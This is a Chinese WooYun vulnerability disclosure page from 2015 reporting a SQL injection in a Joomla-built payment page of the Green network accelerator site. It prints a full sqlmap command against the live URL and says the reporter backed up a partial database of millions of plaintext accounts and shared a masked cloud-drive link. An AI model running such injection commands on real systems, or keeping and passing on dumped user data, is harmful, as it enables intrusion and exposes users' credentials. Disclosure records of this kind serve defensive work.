当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110710

漏洞标题:Green网络加速器某一低级注入引发的数千万用户账号和明文密码泄漏

相关厂商:greenjsq.mobi

漏洞作者: 路人甲

提交时间:2015-04-28 22:02

修复时间:2015-06-13 10:14

公开时间:2015-06-13 10:14

漏洞类型:用户资料大量泄漏

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-28: 细节已通知厂商并且等待厂商处理中
2015-04-29: 厂商已经确认,细节仅向厂商公开
2015-05-09: 细节向核心白帽子及相关领域专家公开
2015-05-19: 细节向普通白帽子公开
2015-05-29: 细节向实习白帽子公开
2015-06-13: 细节向公众公开

简要描述:

之前提交过,以为忘记注入点只记得数据库的地址的和账号密码,所以没通过,这次补全一点吧。

详细说明:

这个漏洞的引发是因为一个CMS的功能所导致。
Joomla,这个CMS有一个功能可以编写一些PHP页面,虽然很方便,但是对于PHP审核不行的码农来说容易造成sql注入漏洞。

漏洞证明:

C:\Windows\SysWOW64>python F:\1204\sqlmap\sqlmap.py -u "https://www.greenjsq.mob
i/my_alipayto.php" --data "username=&prodid=124&aliorder=VIP%E4%B8%A4%E5%B9%B4%E
5%A5%97%E9%A4%90&alibody=%E6%97%B6%E9%95%BF24%2B5%E4%B8%AA%E6%9C%88%EF%BC%8C%E9%
99%902%E5%8F%B0%E7%BB%88%E7%AB%AF%E5%90%8C%E6%97%B6%E4%BD%BF%E7%94%A8&alimoney=2
58&buy.x=66&buy.y=18" -p prodid --dbs --thread 10


这个是所有的数据库

1.jpg


所有数据库的账号和密码

2.png


但是密码被更改了,不过在更改之前我备份了个不完整的数据库,但是也有百万的用户数据。密码账号邮箱号等等都是明文储存。

mask 区域
1.http://**.**.**/s/1eQ8e7C2_
*****^:n*****


审核人员看完请删除网盘连接。

修复方案:

function and safety.
Witch one is more important?
Both are important.

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-04-29 10:13

厂商回复:

已排查并修复漏洞。

最新状态:

暂无